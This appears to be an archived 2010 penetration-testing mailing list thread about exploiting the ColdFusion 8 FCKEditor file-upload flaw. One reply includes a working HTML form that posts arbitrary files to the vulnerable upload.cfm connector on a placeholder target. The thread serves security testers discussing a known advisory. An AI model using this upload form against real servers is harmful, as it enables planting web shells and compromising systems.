Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

Re: ColdFusion 8 w/ FCKEditor

From: The Dead <th3d34d () gmail com>
Date: Wed, 30 Jun 2010 17:59:04 -0300
I got two servers with this condition.

In one of the server, CFM files were allowed to be uploaded as ASP and
others. It was simple to upload to the server using a HTML based form
as:

<html>
<form action="http://target/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?";
method="post" enctype="multipart/form-data">
        <input type="file" name="NewFile"></input>
        <input type="submit">
</form>

In another server, CFM extensions and others like ASP, PHP are not
allowed to be uploaded.
So, I´m trying something to solve this case.

On Wed, Jun 30, 2010 at 5:27 PM, The Dead <th3d34d () gmail com> wrote:

Thanks. I already got it!!
Case solved!

On Wed, Jun 30, 2010 at 5:06 PM, ADAMS, JEFF W (ATTSI) <ja3617 () att com> wrote:

This should get you started:)
http://theinterw3bs.com/?m=200910

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com]
On Behalf Of The Dead
Sent: Tuesday, June 29, 2010 4:49 PM
To: pen-test () securityfocus com
Subject: ColdFusion 8 w/ FCKEditor

Hi,

Is there an exploit avaliable to this vulnerability or a detailed page
explaining technical details about it?
How can I exploit it?
The vulnerability is:
http://www.adobe.com/support/security/bulletins/apsb09-09.html.

Thanks!

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review
Board

Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require
a full practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------






------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT 
and CEPT certs require a full practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: